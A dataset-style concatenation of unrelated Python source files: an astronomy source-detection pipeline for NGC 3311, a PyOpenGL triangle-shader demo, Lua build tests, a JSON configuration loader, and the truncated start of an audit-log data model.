        mask_sources(masked_img, catalog, redo=redo)
if __name__ == "__main__":
    run_ngc3311(redo=True)
| 35.181818 | 78 | 0.639104 |
from __future__ import division, print_function
import os
import pyregion
import numpy as np
from astropy.io import fits
from astropy.convolution import Gaussian2DKernel, convolve
from astropy.table import Table
import matplotlib.pyplot as plt
from astropy.stats import SigmaClip
from photutils.background import Background2D, MedianBackground
import sewpy
import context
from misc import array_from_header
# --- Comment-stripped duplicate copy of the source-extraction pipeline. ---
def background_removed_data(imgname, redo=False, output=None, hdunum=1):
    # Subtract a 2D median background from extension 1 of *imgname* and write
    # the result to "detection.fits"; returns the output file name.
    # NOTE(review): the *output* and *hdunum* arguments are ignored —
    # *output* is unconditionally overwritten and ext=1 is hard-coded.
    data = fits.getdata(imgname, ext=1)
    output = "detection.fits"
    if os.path.exists(output) and not redo:
        return output
    sigma_clip = SigmaClip(sigma=3.)
    bkg_estimator = MedianBackground()
    bkg = Background2D(data, (8, 8), filter_size=(5, 5),
                       sigma_clip=sigma_clip, bkg_estimator = bkg_estimator)
    outdata = data - bkg.background
    fits.writeto(output, outdata, overwrite=True)
    return output
def mask_from_regions(imgname, redo=False):
    # Set the ds9 "mask.reg" regions to NaN and write "detection_masked.fits".
    # NOTE(review): the cached branch returns the mask *data* while the fresh
    # branch returns the *file name* — callers treat the result as a path.
    data = fits.getdata(imgname)
    filename = "mask.reg"
    outfile = "detection_masked.fits"
    if os.path.exists(outfile) and not redo:
        mask = fits.getdata(outfile)
        return mask
    r = pyregion.open(filename)
    for i, region in enumerate(r.get_filter()):
        mask = region.mask(data.shape)
        data[mask] = np.nan
    hdu = fits.PrimaryHDU(data)
    hdu.writeto(outfile, overwrite=True)
    return outfile
def run_sextractor(img, redo=False, outfile=None):
    # Run SExtractor (via sewpy) on *img* and write a FITS source catalogue;
    # returns the catalogue file name, reusing a cached one unless redo.
    if outfile is None:
        outfile = "source-catalog.fits"
    if os.path.exists(outfile) and not redo:
        return outfile
    params = ["NUMBER", "X_IMAGE", "Y_IMAGE", "KRON_RADIUS", "ELLIPTICITY",
              "THETA_IMAGE", "A_IMAGE", "B_IMAGE", "MAG_AUTO", "FLUX_RADIUS"]
    config = {"CHECKIMAGE_TYPE": "BACKGROUND",
              "CHECKIMAGE_NAME": "background.fits",
              "DETECT_THRESH" : 1.5}
    sew = sewpy.SEW(config=config, sexpath="source-extractor", params=params)
    cat = sew(img)
    cat["table"].write(outfile, format="fits", overwrite=True)
    return outfile
def mask_sources(img, cat, ignore=None, redo=False, output=None):
    # Build a segmentation mask marking elliptical regions (1.5 Kron radii)
    # around every catalogued source; returns the output file name.
    if output is None:
        output = "sources_mask.fits"
    if os.path.exists(output) and not redo:
        return output
    data = fits.getdata(img)
    ydim, xdim = data.shape
    # 1-based pixel grid matching SExtractor's coordinate convention.
    xx, yy = np.meshgrid(np.arange(1, xdim + 1), np.arange(1, ydim + 1))
    table = Table.read(cat, 1)
    if ignore is not None:
        idx = np.array([i for i,x in enumerate(table["NUMBER"]) if x not in
                        ignore])
        table = table[idx]
    # NOTE(review): axratio is computed but never used.
    axratio = table["B_IMAGE"] / table["A_IMAGE"]
    mask = np.zeros_like(data)
    for source in table:
        R = calc_isophotes(xx, yy, source["X_IMAGE"], source["Y_IMAGE"], \
                           source["THETA_IMAGE"] - 90, source["B_IMAGE"] /
                           source["A_IMAGE"])
        Rmax = 1.5 * source["KRON_RADIUS"]
        mask += np.where(R <= Rmax, 1, 0)
    hdu = fits.PrimaryHDU(mask)
    hdu.writeto(output, overwrite=True)
    return output
def calc_isophotes(x, y, x0, y0, PA, q):
    # Elliptical radius of each (x, y) point around (x0, y0) for a component
    # with position angle PA (degrees) and axial ratio q.
    x = np.copy(x) - x0
    y = np.copy(y) - y0
    shape = x.shape
    theta = np.radians(PA)
    c, s = np.cos(theta), np.sin(theta)
    rot = np.array([[s, c], [-c, s]])
    xy = np.dot(np.column_stack((x.flatten(), y.flatten())), rot).T
    x = np.reshape(xy[0], newshape=shape)
    y = np.reshape(xy[1], newshape=shape)
    return np.sqrt(np.power(x, 2) + np.power(y / q, 2))
def run_ngc3311(redo=False):
    # Run the full detection pipeline on every NGC 3311 field.
    data_dir = os.path.join(context.home_dir, "data")
    fields = context.fields
    for field in fields:
        os.chdir(os.path.join(data_dir, field))
        if field == "fieldA":
            imgname = "ellipse_model.fits"
        else:
            imgname = f"sn_field{field[-1]}.fits"
        detimg = background_removed_data(imgname, redo=redo)
        immasked = mask_from_regions(detimg, redo=redo)
        sexcat = run_sextractor(immasked, redo=redo)
        mask_sources(immasked, sexcat, redo=redo)
if __name__ == "__main__":
    run_ngc3311(redo=True)
| true | true |
f7230872635c2b1a194e34f4a501f57c0621b597 | 4,793 | py | Python | chapt03/listing310.py | ohlogic/PythonOpenGLSuperBible7Glut | 6100359da13f8ef94070cf4d8818de31fc72cf65 | [
"MIT"
] | 1 | 2021-12-22T11:45:38.000Z | 2021-12-22T11:45:38.000Z | chapt03/listing310.py | ohlogic/PythonOpenGLSuperBible7Glut | 6100359da13f8ef94070cf4d8818de31fc72cf65 | [
"MIT"
] | 1 | 2020-02-01T03:50:20.000Z | 2020-02-01T03:52:03.000Z | chapt03/listing310.py | ohlogic/PythonOpenGLSuperBible7Glut | 6100359da13f8ef94070cf4d8818de31fc72cf65 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
# Copyright © 2012-2015 Graham Sellers
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice (including the next
# paragraph) shall be included in all copies or substantial portions of the
# Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import sys
import time
fullscreen = True
try:
from OpenGL.GLUT import *
from OpenGL.GL import *
from OpenGL.GLU import *
except:
print ('''
ERROR: PyOpenGL not installed properly.
''')
sys.exit()
from math import cos, sin
# Vertex program
vertex_shader_source = '''
#version 450 core
void main(void)
{
const vec4 vertices[3] = vec4[3](
vec4(0.25, -0.25, 0.5, 1.0),
vec4(-0.25, -0.25, 0.5, 1.0),
vec4(0.25, 0.25, 0.5, 1.0));
// Index into our array using gl_VertexID
gl_Position = vertices[gl_VertexID];
}
'''
# Fragment program
fragment_shader_source = '''
#version 450 core
out vec4 color;
void main(void)
{
color = vec4(sin(gl_FragCoord.x * 0.25) * 0.5 + 0.5,
cos(gl_FragCoord.y * 0.25) * 0.5 + 0.5,
sin(gl_FragCoord.x * 0.15) * cos(gl_FragCoord.y * 0.15),
1.0);
}
'''
def compile_program(vertex_source, fragment_source):
    """Compile the given GLSL sources and link them into a GL program.

    Either source may be falsy, in which case that stage is skipped.
    Raises Exception with the driver's info log if a stage fails to compile.
    """
    def build_stage(source, stage_kind, label):
        # Compile one shader stage, raising with the GL info log on failure.
        if not source:
            return None
        shader = glCreateShader(stage_kind)
        glShaderSource(shader, source)
        glCompileShader(shader)
        if not glGetShaderiv(shader, GL_COMPILE_STATUS):
            raise Exception('failed to compile shader "%s":\n%s' %
                            (label, glGetShaderInfoLog(shader)))
        return shader

    vertex_shader = build_stage(vertex_source, GL_VERTEX_SHADER, 'vertex_shader')
    fragment_shader = build_stage(fragment_source, GL_FRAGMENT_SHADER, 'fragment_shader')
    program = glCreateProgram()
    glAttachShader(program, vertex_shader)
    glAttachShader(program, fragment_shader)
    glLinkProgram(program)
    # The intermediate shader objects are no longer needed after linking.
    if vertex_shader:
        glDeleteShader(vertex_shader)
    if fragment_shader:
        glDeleteShader(fragment_shader)
    return program
class Scene:
    """GLUT callback holder: draws a single shaded triangle each frame."""
    def __init__(self):
        # Linked GL program; created lazily on the first display() call so
        # that compilation happens after the GL context exists.
        self.rendering_program = None
    def display(self):
        """Render one frame: clear to dark green and draw the triangle."""
        currentTime = time.time()
        color = [0.0, 0.2, 0.0, 1.0]
        glClearBufferfv(GL_COLOR, 0, color)
        # Bug fix: the original compiled and linked a brand-new program on
        # every frame (display is also the idle callback) and never deleted
        # it, leaking GL objects. Compile once and reuse.
        if self.rendering_program is None:
            self.rendering_program = compile_program(vertex_shader_source,
                                                     fragment_shader_source)
        glUseProgram(self.rendering_program)
        glDrawArrays(GL_TRIANGLES, 0, 3)
        glutSwapBuffers()
    def reshape(self, width, height):
        """Window-resize callback (no-op for this demo)."""
        pass
    def keyboard(self, key, x, y ):
        """Handle ESC (quit) and 'f'/'F' (toggle fullscreen)."""
        global fullscreen
        print ('key:' , key)
        if key == b'\x1b': # ESC
            sys.exit()
        elif key == b'f' or key == b'F': #fullscreen toggle
            if (fullscreen == True):
                glutReshapeWindow(512, 512)
                glutPositionWindow(int((1360/2)-(512/2)), int((768/2)-(512/2)))
                fullscreen = False
            else:
                glutFullScreen()
                fullscreen = True
        print('done')
    def init(self):
        """One-time setup hook (unused)."""
        pass
if __name__ == '__main__':
    start = time.time()
    glutInit()
    # Double-buffered RGBA window with a depth buffer.
    glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)
    w1 = glutCreateWindow('Listing 3.10')
    # Centre the 512x512 window on a 1360x768 desktop.
    glutInitWindowPosition(int((1360/2)-(512/2)), int((768/2)-(512/2)))
    fullscreen = False
    #glutFullScreen()
    scene = Scene()
    # Register GLUT callbacks; display doubles as the idle function so the
    # scene redraws continuously.
    glutReshapeFunc(scene.reshape)
    glutDisplayFunc(scene.display)
    glutKeyboardFunc(scene.keyboard)
    glutIdleFunc(scene.display)
    scene.init()
    glutMainLoop()
| 25.094241 | 83 | 0.638431 |
import sys
import time
fullscreen = True
try:
from OpenGL.GLUT import *
from OpenGL.GL import *
from OpenGL.GLU import *
except:
print ('''
ERROR: PyOpenGL not installed properly.
''')
sys.exit()
from math import cos, sin
vertex_shader_source = '''
#version 450 core
void main(void)
{
const vec4 vertices[3] = vec4[3](
vec4(0.25, -0.25, 0.5, 1.0),
vec4(-0.25, -0.25, 0.5, 1.0),
vec4(0.25, 0.25, 0.5, 1.0));
// Index into our array using gl_VertexID
gl_Position = vertices[gl_VertexID];
}
'''
fragment_shader_source = '''
#version 450 core
out vec4 color;
void main(void)
{
color = vec4(sin(gl_FragCoord.x * 0.25) * 0.5 + 0.5,
cos(gl_FragCoord.y * 0.25) * 0.5 + 0.5,
sin(gl_FragCoord.x * 0.15) * cos(gl_FragCoord.y * 0.15),
1.0);
}
'''
# --- Comment-stripped duplicate copy of the listing 3.10 demo. ---
def compile_program(vertex_source, fragment_source):
    # Compile optional vertex/fragment GLSL sources, link them into a GL
    # program object, delete the intermediate shader objects and return the
    # program handle; raises Exception with the GL info log on failure.
    vertex_shader = None
    fragment_shader = None
    if vertex_source:
        vertex_shader = glCreateShader(GL_VERTEX_SHADER)
        glShaderSource(vertex_shader, vertex_source)
        glCompileShader(vertex_shader)
        if not glGetShaderiv(vertex_shader, GL_COMPILE_STATUS):
            raise Exception('failed to compile shader "%s":\n%s' %
                            ('vertex_shader', glGetShaderInfoLog(vertex_shader)))
    if fragment_source:
        fragment_shader = glCreateShader(GL_FRAGMENT_SHADER)
        glShaderSource(fragment_shader, fragment_source)
        glCompileShader(fragment_shader)
        if not glGetShaderiv(fragment_shader, GL_COMPILE_STATUS):
            raise Exception('failed to compile shader "%s":\n%s' %
                            ('fragment_shader', glGetShaderInfoLog(fragment_shader)))
    program = glCreateProgram()
    glAttachShader(program, vertex_shader)
    glAttachShader(program, fragment_shader)
    glLinkProgram(program)
    if vertex_shader:
        glDeleteShader(vertex_shader)
    if fragment_shader:
        glDeleteShader(fragment_shader)
    return program
class Scene:
    # GLUT callback holder that draws a single shaded triangle each frame.
    def __init__(self):
        pass
    def display(self):
        # NOTE(review): compiles a brand-new GL program on every frame and
        # never deletes it — a GL object leak; display is also the idle func.
        currentTime = time.time()
        color = [ 0.0, 0.2, 0.0, 1.0 ];
        glClearBufferfv(GL_COLOR, 0, color)
        glUseProgram(compile_program(vertex_shader_source, fragment_shader_source))
        glDrawArrays(GL_TRIANGLES, 0, 3);
        glutSwapBuffers()
    def reshape(self, width, height):
        # Window-resize callback (no-op for this demo).
        pass
    def keyboard(self, key, x, y ):
        # ESC quits; 'f'/'F' toggles fullscreen.
        global fullscreen
        print ('key:' , key)
        if key == b'\x1b':
            sys.exit()
        elif key == b'f' or key == b'F':
            if (fullscreen == True):
                glutReshapeWindow(512, 512)
                glutPositionWindow(int((1360/2)-(512/2)), int((768/2)-(512/2)))
                fullscreen = False
            else:
                glutFullScreen()
                fullscreen = True
        print('done')
    def init(self):
        # One-time setup hook (unused).
        pass
if __name__ == '__main__':
    start = time.time()
    glutInit()
    glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)
    w1 = glutCreateWindow('Listing 3.10')
    glutInitWindowPosition(int((1360/2)-(512/2)), int((768/2)-(512/2)))
    fullscreen = False
    scene = Scene()
    # display doubles as the idle function, so the scene redraws continuously.
    glutReshapeFunc(scene.reshape)
    glutDisplayFunc(scene.display)
    glutKeyboardFunc(scene.keyboard)
    glutIdleFunc(scene.display)
    scene.init()
    glutMainLoop()
| true | true |
f72308dbe1714573180f73ead6dbb0749b0d73a2 | 1,913 | py | Python | tests/functional/libraries/test_lua.py | carlbrown/needy | 5a70726c9846f86a88be896ec39740296d503835 | [
"MIT"
] | 65 | 2015-07-21T01:40:17.000Z | 2019-06-10T10:46:28.000Z | tests/functional/libraries/test_lua.py | bittorrent/needy | 31e57ad09d5fc22126e10b735c586262a50139d7 | [
"MIT"
] | 110 | 2015-07-21T01:41:40.000Z | 2017-01-18T23:13:30.000Z | tests/functional/libraries/test_lua.py | bittorrent/needy | 31e57ad09d5fc22126e10b735c586262a50139d7 | [
"MIT"
] | 4 | 2015-07-20T02:45:43.000Z | 2016-07-31T21:48:39.000Z | import json
import os
import sys
from ..functional_test import TestCase
class LuaTest(TestCase):
    """Functional tests that build the lua 5.2.1 need from source."""

    # Shared download descriptor for both tests (previously duplicated
    # verbatim in each test body).
    _DOWNLOAD = 'http://www.lua.org/ftp/lua-5.2.1.tar.gz'
    _CHECKSUM = '6bb1b0a39b6a5484b71a83323c690154f86b2021'

    def _write_needs(self, project):
        """Write a needs.json declaring the lua library with *project* settings."""
        with open(os.path.join(self.path(), 'needs.json'), 'w') as needs_file:
            needs_file.write(json.dumps({
                'libraries': {
                    'lua': {
                        'download': self._DOWNLOAD,
                        'checksum': self._CHECKSUM,
                        'project': project,
                    }
                }
            }))

    def _assert_artifacts(self, libname):
        """Assert that the built header and static library exist."""
        self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'include', 'lua.h')))
        self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'lib', libname)))

    def test_satisfy_from_source(self):
        """Build lua with the generic project integration."""
        self._write_needs({'exclude': ['lua.c', 'luac.c']})
        self.assertEqual(self.satisfy(), 0)
        self._assert_artifacts('lua.lib' if sys.platform == 'win32' else 'liblua.a')

    # lua's Makefile path is only exercised on non-Windows platforms.
    if sys.platform != 'win32':
        def test_satisfy_with_make(self):
            """Build lua through its own Makefile ("generic" target)."""
            self._write_needs({
                'make-targets': 'generic',
                'make-prefix-arg': 'INSTALL_TOP',
            })
            self.assertEqual(self.satisfy(), 0)
            self._assert_artifacts('liblua.a')
| 43.477273 | 143 | 0.48092 | import json
import os
import sys
from ..functional_test import TestCase
class LuaTest(TestCase):
    """Functional tests that build the lua 5.2.1 need from source."""
    def test_satisfy_from_source(self):
        """Build lua with the generic project integration."""
        with open(os.path.join(self.path(), 'needs.json'), 'w') as needs_file:
            needs_file.write(json.dumps({
                'libraries': {
                    'lua': {
                        'download': 'http://www.lua.org/ftp/lua-5.2.1.tar.gz',
                        'checksum': '6bb1b0a39b6a5484b71a83323c690154f86b2021',
                        'project': {
                            'exclude': ['lua.c', 'luac.c']
                        }
                    }
                }
            }))
        self.assertEqual(self.satisfy(), 0)
        # Both the header and the platform-appropriate static library must exist.
        self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'include', 'lua.h')))
        self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'lib', 'lua.lib' if sys.platform == 'win32' else 'liblua.a')))
    # lua's Makefile path is only exercised on non-Windows platforms.
    if sys.platform != 'win32':
        def test_satisfy_with_make(self):
            """Build lua through its own Makefile ("generic" target)."""
            with open(os.path.join(self.path(), 'needs.json'), 'w') as needs_file:
                needs_file.write(json.dumps({
                    'libraries': {
                        'lua': {
                            'download': 'http://www.lua.org/ftp/lua-5.2.1.tar.gz',
                            'checksum': '6bb1b0a39b6a5484b71a83323c690154f86b2021',
                            'project': {
                                'make-targets': 'generic',
                                'make-prefix-arg': 'INSTALL_TOP',
                            }
                        }
                    }
                }))
            self.assertEqual(self.satisfy(), 0)
            self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'include', 'lua.h')))
            self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'lib', 'liblua.a')))
| true | true |
f7230a0700ec0f71e3df6dba98dec207b83c834b | 876 | py | Python | lib/googlecloudsdk/api_lib/datastore/constants.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/googlecloudsdk/api_lib/datastore/constants.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 11 | 2020-02-29T02:51:12.000Z | 2022-03-30T23:20:08.000Z | lib/googlecloudsdk/api_lib/datastore/constants.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | # -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Constants used for Cloud Datastore."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
# Special marker used for the default namespace in gcloud commands.
DEFAULT_NAMESPACE = '(default)'
| 38.086957 | 74 | 0.768265 |
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
DEFAULT_NAMESPACE = '(default)'
| true | true |
f7230b0b25991ce2d65383489baf50b9ebc9effb | 5,416 | py | Python | src/programy/config/file/json_file.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | null | null | null | src/programy/config/file/json_file.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | null | null | null | src/programy/config/file/json_file.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 4 | 2019-04-01T15:42:23.000Z | 2020-11-05T08:14:27.000Z | """
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
from programy.utils.logging.ylogger import YLogger
from programy.config.file.file import BaseConfigurationFile
from programy.config.programy import ProgramyConfiguration
from programy.utils.substitutions.substitues import Substitutions
class JSONConfigurationFile(BaseConfigurationFile):
    """Loads program-y configuration data from JSON text or files."""
    def __init__(self):
        BaseConfigurationFile.__init__(self)
        # Parsed JSON document; populated by load_from_text/load_from_file.
        self.json_data = None
    def load_from_text(self, text, client_configuration, bot_root):
        """Parse *text* as JSON and load it into a ProgramyConfiguration."""
        self.json_data = json.loads(text)
        configuration = ProgramyConfiguration(client_configuration)
        configuration.load_config_data(self, bot_root)
        return configuration
    def load_from_file(self, filename, client_configuration, bot_root):
        """Parse the JSON file *filename* and load it into a ProgramyConfiguration.

        On any read/parse error the exception is logged and an (empty)
        configuration is still returned.
        """
        configuration = ProgramyConfiguration(client_configuration)
        try:
            with open(filename, 'r+', encoding="utf-8") as json_data_file:
                self.json_data = json.load(json_data_file)
                configuration.load_config_data(self, bot_root)
        except Exception as excep:
            YLogger.exception(self, "Failed to open json config file [%s]", excep, filename)
        return configuration
    def get_section(self, section_name, parent_section=None):
        """Return the named section from *parent_section* (or the document root), or None."""
        if parent_section is None:
            if section_name in self.json_data:
                return self.json_data[section_name]
        else:
            if section_name in parent_section:
                return parent_section[section_name]
        return None
    def get_keys(self, section):
        """Return the keys of *section*."""
        return section.keys()
    def get_child_section_keys(self, child_section_name, parent_section):
        """Return the keys of a child section, or None if it does not exist."""
        if child_section_name in parent_section:
            return parent_section[child_section_name].keys()
        return None
    def get_option(self, section, option_name, missing_value=None, subs: Substitutions = None):
        """Return an option value (with substitutions applied) or *missing_value*."""
        if option_name in section:
            option_value = section[option_name]
            return self._replace_subs(subs, option_value)
        YLogger.warning(self, "Missing value for [%s] in config , return default value %s", option_name, missing_value)
        return missing_value
    def get_bool_option(self, section, option_name, missing_value=False, subs: Substitutions = None):
        """Return a boolean option or *missing_value* if absent.

        NOTE(review): non-bool values are coerced with bool() after
        substitution, so any non-empty string (including "false") becomes
        True — confirm this is the intended behaviour.
        """
        if option_name in section:
            option_value = section[option_name]
            if isinstance(option_value, bool):
                return option_value
            return bool(self._replace_subs(subs, option_value))
        YLogger.warning(self, "Missing value for [%s] in config, return default value %s", option_name, missing_value)
        return missing_value
    def get_int_option(self, section, option_name, missing_value=0, subs: Substitutions = None):
        """Return an integer option (coercing strings with int()) or *missing_value*."""
        if option_name in section:
            option_value = section[option_name]
            if isinstance(option_value, int):
                return option_value
            return int(self._replace_subs(subs, option_value))
        if missing_value is not None:
            YLogger.warning(self, "Missing value for [%s] in config, return default value %d", option_name, missing_value)
        else:
            YLogger.warning(self, "Missing value for [%s] in config, return default value None", option_name)
        return missing_value
    def get_multi_option(self, section, option_name, missing_value=None, subs: Substitutions = None):
        """Return an option as a list, wrapping scalars and applying substitutions."""
        if missing_value is None:
            missing_value = []
        value = self. get_option(section, option_name, missing_value)
        if isinstance(value, list):
            values = value
        else:
            values = [value]
        multis = []
        for value in values:
            multis.append(self._replace_subs(subs, value))
        return multis
    def get_multi_file_option(self, section, option_name, bot_root, missing_value=None, subs: Substitutions = None):
        """Return an option as a list of paths, expanding $BOT_ROOT to *bot_root*."""
        if missing_value is None:
            missing_value = []
        value = self. get_option(section, option_name, missing_value)
        if isinstance(value, list):
            values = value
        else:
            values = [value]
        multis = []
        for value in values:
            value = self._replace_subs(subs, value)
            multis.append(value.replace('$BOT_ROOT', bot_root))
        return multis
| 40.721805 | 122 | 0.693501 |
import json
from programy.utils.logging.ylogger import YLogger
from programy.config.file.file import BaseConfigurationFile
from programy.config.programy import ProgramyConfiguration
from programy.utils.substitutions.substitues import Substitutions
class JSONConfigurationFile(BaseConfigurationFile):
    """Loads program-y configuration data from JSON text or files (duplicate copy)."""
    def __init__(self):
        BaseConfigurationFile.__init__(self)
        # Parsed JSON document; populated by the load_from_* methods.
        self.json_data = None
    def load_from_text(self, text, client_configuration, bot_root):
        # Parse *text* as JSON and load it into a ProgramyConfiguration.
        self.json_data = json.loads(text)
        configuration = ProgramyConfiguration(client_configuration)
        configuration.load_config_data(self, bot_root)
        return configuration
    def load_from_file(self, filename, client_configuration, bot_root):
        # Parse a JSON file; read/parse errors are logged and an (empty)
        # configuration is still returned.
        configuration = ProgramyConfiguration(client_configuration)
        try:
            with open(filename, 'r+', encoding="utf-8") as json_data_file:
                self.json_data = json.load(json_data_file)
                configuration.load_config_data(self, bot_root)
        except Exception as excep:
            YLogger.exception(self, "Failed to open json config file [%s]", excep, filename)
        return configuration
    def get_section(self, section_name, parent_section=None):
        # Look up a section in *parent_section*, or the document root.
        if parent_section is None:
            if section_name in self.json_data:
                return self.json_data[section_name]
        else:
            if section_name in parent_section:
                return parent_section[section_name]
        return None
    def get_keys(self, section):
        # Keys of a section mapping.
        return section.keys()
    def get_child_section_keys(self, child_section_name, parent_section):
        # Keys of a child section, or None if the child does not exist.
        if child_section_name in parent_section:
            return parent_section[child_section_name].keys()
        return None
    def get_option(self, section, option_name, missing_value=None, subs: Substitutions = None):
        # Option value with substitutions applied, or *missing_value*.
        if option_name in section:
            option_value = section[option_name]
            return self._replace_subs(subs, option_value)
        YLogger.warning(self, "Missing value for [%s] in config , return default value %s", option_name, missing_value)
        return missing_value
    def get_bool_option(self, section, option_name, missing_value=False, subs: Substitutions = None):
        # NOTE(review): non-bool values are coerced with bool() after
        # substitution, so any non-empty string (even "false") becomes True.
        if option_name in section:
            option_value = section[option_name]
            if isinstance(option_value, bool):
                return option_value
            return bool(self._replace_subs(subs, option_value))
        YLogger.warning(self, "Missing value for [%s] in config, return default value %s", option_name, missing_value)
        return missing_value
    def get_int_option(self, section, option_name, missing_value=0, subs: Substitutions = None):
        # Integer option (strings coerced with int()), or *missing_value*.
        if option_name in section:
            option_value = section[option_name]
            if isinstance(option_value, int):
                return option_value
            return int(self._replace_subs(subs, option_value))
        if missing_value is not None:
            YLogger.warning(self, "Missing value for [%s] in config, return default value %d", option_name, missing_value)
        else:
            YLogger.warning(self, "Missing value for [%s] in config, return default value None", option_name)
        return missing_value
    def get_multi_option(self, section, option_name, missing_value=None, subs: Substitutions = None):
        # Option as a list: scalars are wrapped, substitutions applied per item.
        if missing_value is None:
            missing_value = []
        value = self. get_option(section, option_name, missing_value)
        if isinstance(value, list):
            values = value
        else:
            values = [value]
        multis = []
        for value in values:
            multis.append(self._replace_subs(subs, value))
        return multis
    def get_multi_file_option(self, section, option_name, bot_root, missing_value=None, subs: Substitutions = None):
        # Option as a list of paths, expanding $BOT_ROOT to *bot_root*.
        if missing_value is None:
            missing_value = []
        value = self. get_option(section, option_name, missing_value)
        if isinstance(value, list):
            values = value
        else:
            values = [value]
        multis = []
        for value in values:
            value = self._replace_subs(subs, value)
            multis.append(value.replace('$BOT_ROOT', bot_root))
        return multis
| true | true |
f7230c6242e45502a884e52bfeedc92cf49212a1 | 2,362 | py | Python | core/storage/audit/gae_models.py | aman-roy/oppia | 0e7066829b59bf6ce4b15c4723fe0398721cfd1a | [
"Apache-2.0"
] | 2 | 2019-12-02T18:56:49.000Z | 2020-03-14T17:14:15.000Z | core/storage/audit/gae_models.py | aman-roy/oppia | 0e7066829b59bf6ce4b15c4723fe0398721cfd1a | [
"Apache-2.0"
] | 2 | 2019-09-11T23:11:48.000Z | 2019-11-29T06:04:52.000Z | core/storage/audit/gae_models.py | aman-roy/oppia | 0e7066829b59bf6ce4b15c4723fe0398721cfd1a | [
"Apache-2.0"
] | 2 | 2019-12-02T18:56:56.000Z | 2020-03-16T08:03:45.000Z | # coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Models for storing the audit logs."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.platform import models
import feconf
from google.appengine.ext import ndb
(base_models,) = models.Registry.import_models([models.NAMES.base_model])
class RoleQueryAuditModel(base_models.BaseModel):
    """Records the data for query made to the role structure using admin
    interface.

    Instances of this class are keyed by a custom id of the form:
        [user_id].[timestamp_in_sec].[intent].[random_number]
    """

    # The user_id of the user making query.
    user_id = ndb.StringProperty(required=True, indexed=True)
    # The intent of making query (viewing (by role or username)
    # or updating role). Restricted to the three ROLE_ACTION_* constants.
    intent = ndb.StringProperty(required=True, choices=[
        feconf.ROLE_ACTION_UPDATE,
        feconf.ROLE_ACTION_VIEW_BY_ROLE,
        feconf.ROLE_ACTION_VIEW_BY_USERNAME
    ], indexed=True)
